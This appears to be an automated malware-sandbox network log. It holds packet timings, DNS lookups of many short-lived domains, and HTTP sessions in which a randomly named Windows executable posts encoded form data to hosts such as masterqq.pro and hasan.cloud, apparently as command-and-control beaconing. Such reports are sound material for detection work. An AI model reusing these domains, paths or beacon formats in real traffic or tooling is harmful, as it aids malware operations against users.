                                                                                                                                      Jan 11, 2025 09:39:25.222764969 CET8050052193.180.209.15192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:30.469423056 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.474313974 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:30.474390030 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.491816998 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:30.496725082 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:31.016468048 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:31.016515017 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:32.002238035 CET5005380192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:32.007827997 CET8050053208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.019251108 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.024436951 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.024528027 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.043699980 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:33.048568964 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.569820881 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:33.575397968 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:34.545840979 CET5005480192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:34.551037073 CET8050054208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.564826965 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.569791079 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.569875956 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.587279081 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:35.592303991 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592339039 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592365980 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592416048 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592442989 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592483044 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592530966 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592557907 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:35.592583895 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:36.087635994 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:36.089385033 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:37.092885017 CET5005580192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:37.097790003 CET8050055208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:38.115242958 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.120106936 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:38.120259047 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.129260063 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:38.134161949 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184936047 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184967995 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.184984922 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185003996 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185014963 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185038090 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185050964 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185061932 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185074091 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185086012 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.185112953 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.185158014 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.189982891 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190084934 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190119028 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190130949 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.190152884 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.190224886 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.273402929 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273422003 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273441076 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273452997 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273551941 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.273741007 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:39.273775101 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.279285908 CET5005680192.168.2.4208.91.197.27
                                                                                                                                      Jan 11, 2025 09:39:39.284094095 CET8050056208.91.197.27192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.300744057 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.305681944 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.305941105 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.322094917 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.327003002 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937340975 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937367916 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937413931 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:44.937665939 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937683105 CET8050057104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:44.937719107 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:45.827322960 CET5005780192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.846914053 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.851856947 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:46.851939917 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.871189117 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:46.876046896 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397185087 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397242069 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397325993 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:47.397471905 CET8050058104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:47.397552013 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:48.374001980 CET5005880192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.392641068 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.397674084 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.397763968 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.414685965 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:49.419786930 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419804096 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419827938 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419840097 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419946909 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.419959068 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420039892 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420063019 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:49.420198917 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019889116 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019906044 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.019923925 CET8050059104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:50.020080090 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:50.920856953 CET5005980192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.939532995 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.944403887 CET8050060104.21.88.139192.168.2.4
                                                                                                                                      Jan 11, 2025 09:39:51.944560051 CET5006080192.168.2.4104.21.88.139
                                                                                                                                      Jan 11, 2025 09:39:51.953730106 CET5006080192.168.2.4104.21.88.139
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                                                                                                      Jan 11, 2025 09:36:50.224997997 CET1.1.1.1192.168.2.40xcb23No error (0)www.hasan.cloud76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:11.380100965 CET1.1.1.1192.168.2.40xd3b0No error (0)www.0be.info0be.infoCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:11.380100965 CET1.1.1.1192.168.2.40xd3b0No error (0)0be.info173.0.157.187A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:24.777404070 CET1.1.1.1192.168.2.40x8331Server failure (2)www.tageting.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:32.843305111 CET1.1.1.1192.168.2.40xb6a5Server failure (2)www.ulojenukw.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:40.948688984 CET1.1.1.1192.168.2.40xf0No error (0)www.ssps.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:40.948688984 CET1.1.1.1192.168.2.40xf0No error (0)www.ssps.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:54.455653906 CET1.1.1.1192.168.2.40x98d9No error (0)www.qqc5.topqqc5.topCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:37:54.455653906 CET1.1.1.1192.168.2.40x98d9No error (0)qqc5.top38.47.233.4A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:08.352806091 CET1.1.1.1192.168.2.40x6569No error (0)www.learnnow.info199.192.23.123A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:21.835967064 CET1.1.1.1192.168.2.40x7718No error (0)www.goldbracelet.top104.21.36.239A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:21.835967064 CET1.1.1.1192.168.2.40x7718No error (0)www.goldbracelet.top172.67.201.49A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:35.218882084 CET1.1.1.1192.168.2.40xf26dNo error (0)www.regislemberthe.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:49.035897970 CET1.1.1.1192.168.2.40x40f4No error (0)www.honk.city13.248.169.48A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:38:49.035897970 CET1.1.1.1192.168.2.40x40f4No error (0)www.honk.city76.223.54.146A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:03.563486099 CET1.1.1.1192.168.2.40x4cafNo error (0)www.gupiao.bet54.67.42.145A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:16.842456102 CET1.1.1.1192.168.2.40xa0e4No error (0)www.fengzheng.shop193.180.209.15A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:30.466516972 CET1.1.1.1192.168.2.40x70bfNo error (0)www.joeltcarpenter.online208.91.197.27A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:44.298317909 CET1.1.1.1192.168.2.40x5282No error (0)www.incgruporxat.click104.21.88.139A (IP address)IN (0x0001)false
                                                                                                                                      Jan 11, 2025 09:39:44.298317909 CET1.1.1.1192.168.2.40x5282No error (0)www.incgruporxat.click172.67.180.24A (IP address)IN (0x0001)false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49741 | 15.197.142.173 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:36:21.291078091 CET | 444 | OUT | GET /zxe0/?sTS=El+NSyicP5BK/60Db2Xg1o31Ym1kL1m1F+D0aleaH+wp2K9lM+jEhQu4F5Y51N1X01h2I0uJ1YrEHciK2w5TkDzccLdwJ4YQfOICjey7dRE9nJA6OdtOGEU=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.dojodigitize.shop
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:36:21.767122984 CET | 133 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Server: awselb/2.0
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:21 GMT
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      WAFRule: 5


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49742 | 104.21.80.1 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:36:36.856225014 CET | 702 | OUT | POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:36:37.469358921 CET | 1043 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:37 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9ymb4KrvUeLVcVZlhQFieLHHevruRqxD9R18QK2tUUi5e17NXSRR1gKvD%2Fx7zGFlpDt%2F7zh2wIa6bhHH9iwZCSjN2XpCAFsRotct7dxe4FQOaNhDem6C6c52NzuRXh9bhjm"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039484caad43ee-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1700&min_rtt=1700&rtt_var=850&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=702&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 104.21.80.1 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:36:39.397872925 CET | 722 | OUT | POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
Jan 11, 2025 09:36:39.976943016 CET | 1051 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:39 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DLxKC8RIvOvWYar4NPE6SghbWCE9mAlrjvLQ8mQG%2FhmsMgw3Pk6PWa5woNozuvvnTgwysMj8aSAqRMXp59ZvIOtcbs5oOBeVddBYpJ4Nw2tAtUgPD3NMfrVUp0unmcmwI4oj"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 90039494ae68c443-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1616&rtt_var=808&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=722&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49744 | 104.21.80.1 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
Timestamp | Bytes transferred | Direction | Data
Jan 11, 2025 09:36:41.944499969 CET | 10804 | OUT | POST /vfw3/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 10300
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.masterqq.pro
                                                                                                                                      Referer: http://www.masterqq.pro/vfw3/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:36:42.551419973 CET | 1050 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:42 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=adSmNktWpLTAXUHEC0JV%2F00WnQwDDeyVMLNfRsbj3EBI%2Bt8PuZez1AfURSKE4iJS2VpXo2C7lzJwGkOJlI619kmm6TuEgR3OvFdW5r%2B7ADpoz65tN6Ea%2BpZXgvc5roTZ9clc"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900394a49ea60f36-EWR
                                                                                                                                      Content-Encoding: gzip
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1435&min_rtt=1435&rtt_var=717&sent=4&recv=10&lost=0&retrans=0&sent_bytes=0&recv_bytes=10804&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      4 | 192.168.2.4 | 49745 | 104.21.80.1 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:36:44.484575987 CET | 439 | OUT | GET /vfw3/?sTS=rqg4sojPN1HzbyOnDHJ3Cr7oIHIM290cauZgTy6bg/7NgADr7OmLN934TwPzSFzjuedcHscZgYNpl4RBVJqUXd9S1SYp7SdNfp3f2O4BoE1UQty0MmYBNPM=&fd=Cr_TAhTpvZaLf HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.masterqq.pro
                                                                                                                                      Connection: close
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Jan 11, 2025 09:36:45.094115973 CET | 1065 | IN | HTTP/1.1 404 Not Found
                                                                                                                                      Date: Sat, 11 Jan 2025 08:36:45 GMT
                                                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                      Connection: close
                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cpqFH0MV3vAGIoiCJ5EB22Ee7XKFmQG%2FjQlyFjxA2nZqD6FnQezO4TL7XkPVtcnMvZuCWWQ6YwejTqlHRcYiIBU%2FeCX3NekvsksSKGgfBmLL%2BcdB3qWbGm8oKwC9tHTU1IoC"}],"group":"cf-nel","max_age":604800}
                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                      Server: cloudflare
                                                                                                                                      CF-RAY: 900394b489137d0e-EWR
                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1904&min_rtt=1904&rtt_var=952&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=439&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                                      Data Ascii: 105<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>10


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      5 | 192.168.2.4 | 49757 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:36:50.246267080 CET | 699 | OUT | POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 200
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/tzTZMy3Yd0Zb2dZ067H8VDbvV3SGZ8NTkxI+AJwcDjG+buD8QMOjICvJDV3VFgubMLKcrvgtt3jhP5V3g9qNrhJYXQrOv41oUazAO+M41JRKs9ozDQLwvFXq3MTv/VriSAzqXxnisMEXzMp86iacvv0apyXmxvHixOmfk+/GpDEHFA7JYYD+uw==
                                                                                                                                      Jan 11, 2025 09:36:50.703704119 CET | 73 | IN | HTTP/1.1 405 Method Not Allowed
                                                                                                                                      content-length: 0
                                                                                                                                      connection: close


                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                      6 | 192.168.2.4 | 49774 | 13.248.169.48 | 80 | 4588 | C:\Program Files (x86)\AShVEPcAWMFuGJOwdmyYiWSqrEqSlBoNyZjlBYfnvSqaXMqfamJCuO\oPkpFmCiYVL.exe
                                                                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                                                                      Jan 11, 2025 09:36:52.789062023 CET | 719 | OUT | POST /ve8l/ HTTP/1.1
                                                                                                                                      Accept: */*
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Host: www.hasan.cloud
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Content-Length: 220
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                      Origin: http://www.hasan.cloud
                                                                                                                                      Referer: http://www.hasan.cloud/ve8l/
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.18 Safari/537.36 BitdefenderSafepay/2016 (3.43.0.2357.18, like Chrome 20150815)
                                                                                                                                      Data Ascii: sTS=7ArYO37KdNV/sQLZAz3YcUZU59Z0jrHCVDnvV2msZupTkR4+BMccAjG+TOD5dsOoICjBDXTVFjSbMJicqYUuuHjjAZV19tqNrhJYXQOpv4doUvjAOc03rZRJ8NozOwL0vFXU3JyK/XjiSFXqUjP9mMER3MoVqXzS2txqhh3687bv0IrF1PeR7Dg0YHy9Vb+3148HSvdlx/bGB7HfuYWcT7I=


